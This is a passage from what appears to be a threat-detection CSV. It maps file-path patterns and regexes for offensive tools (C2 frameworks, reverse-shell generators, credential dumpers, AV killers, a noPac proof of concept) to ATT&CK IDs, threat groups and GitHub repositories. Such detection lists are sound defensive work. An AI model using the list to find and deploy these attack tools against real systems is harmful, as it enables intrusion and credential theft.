Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/setuserpass/",".{0,1000}\/Remote\/setuserpass\/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/setuserpass/*",".{0,1000}\/Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/unexpireuser/*",".{0,1000}\/Remote\/unexpireuser\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\/RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/RemoteHashRetrieval.ps1*",".{0,1000}\/RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a 
post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/remote-method-guesser.git*",".{0,1000}\/remote\-method\-guesser\.git.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*/RemoteOps.py*",".{0,1000}\/RemoteOps\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/RemotePotato0.git*",".{0,1000}\/RemotePotato0\.git.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*/RemotePotato0.zip*",".{0,1000}\/RemotePotato0\.zip.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*/remotereg.c*",".{0,1000}\/remotereg\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remotereg.o*",".{0,1000}\/remotereg\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*/remoteshell.py*",".{0,1000}\/remoteshell\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*/request_shellcode.exe*",".{0,1000}\/request_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/resolveall.nse*",".{0,1000}\/resolveall\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/resources/PROCEXP.sys*",".{0,1000}\/resources\/PROCEXP\.sys.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1309","231","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" "*/resources/selfdestruction*",".{0,1000}\/resources\/selfdestruction.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/Responder.git*",".{0,1000}\/Responder\.git.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/responder/Responder.conf *",".{0,1000}\/responder\/Responder\.conf\s.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/Responder/Responder.conf*",".{0,1000}\/Responder\/Responder\.conf.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/Responder-master.zip*",".{0,1000}\/Responder\-master\.zip.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/restoresig.py*",".{0,1000}\/restoresig\.py.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*/returnvar/wce/*",".{0,1000}\/returnvar\/wce\/.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/rev_shell.py*",".{0,1000}\/rev_shell\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*/Reverse Shell Tab -->*",".{0,1000}\/Reverse\sShell\sTab\s\-\-\>.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/reverse.exe*",".{0,1000}\/reverse\.exe.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/reverse-index.nse*",".{0,1000}\/reverse\-index\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/reverseShell-1.0.1-zip.zip*",".{0,1000}\/reverseShell\-1\.0\.1\-zip\.zip.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*/reverse-shellcode.cpp*",".{0,1000}\/reverse\-shellcode\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/reverse-shell-generator*",".{0,1000}\/reverse\-shell\-generator.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","2703","579","2024-04-18T18:05:44Z","2021-02-27T00:53:13Z" "*/reverse-shell-generator.git*",".{0,1000}\/reverse\-shell\-generator\.git.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/reverse-ssh.git*",".{0,1000}\/reverse\-ssh\.git.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh/*",".{0,1000}\/reverse\-ssh\/.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh-armv7-x86*",".{0,1000}\/reverse\-ssh\-armv7\-x86.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-ssh-armv8-x64*",".{0,1000}\/reverse\-ssh\-armv8\-x64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/reverse-sshx64*",".{0,1000}\/reverse\-sshx64.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","1","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*/ReverseTCPShell*",".{0,1000}\/ReverseTCPShell.{0,1000}","offensive_tool_keyword","ReverseTCPShell","PowerShell ReverseTCP Shell - Framework","T1059.001 ","TA0011 ","N/A","N/A","C2","https://github.com/ZHacker13/ReverseTCPShell","1","1","N/A","10","10","1029","219","2022-09-18T20:59:33Z","2019-05-27T23:43:54Z" "*/reverst.git*",".{0,1000}\/reverst\.git.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*/Rev-Shell.git*",".{0,1000}\/Rev\-Shell\.git.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/revshell.ps1*",".{0,1000}\/revshell\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 
TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/revshell.py*",".{0,1000}\/revshell\.py.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","1","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*/revshell32.bin*",".{0,1000}\/revshell32\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/revshell64.bin*",".{0,1000}\/revshell64\.bin.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*/revshells.com*",".{0,1000}\/revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a 
firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/revsocks.exe*",".{0,1000}\/revsocks\.exe.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/emilarner/revsocks","1","1","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","28","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z" "*/revsocks.git*",".{0,1000}\/revsocks\.git.{0,1000}","offensive_tool_keyword","revsocks","Reverse SOCKS5 implementation in Go","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/kost/revsocks","1","1","N/A","10","10","294","44","2024-03-13T22:31:05Z","2019-10-04T09:09:37Z" "*/rexec-brute.nse*",".{0,1000}\/rexec\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfc868-time.nse*",".{0,1000}\/rfc868\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rfs_injection.exe*",".{0,1000}\/rfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/RGPerson.py*",".{0,1000}\/RGPerson\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/riak-http-info.nse*",".{0,1000}\/riak\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ricardojba/Invoke-noPac*",".{0,1000}\/ricardojba\/Invoke\-noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/Invoke-noPac","1","1","N/A","N/A","1","59","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z" "*/ricardojba/noPac*",".{0,1000}\/ricardojba\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","1","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" 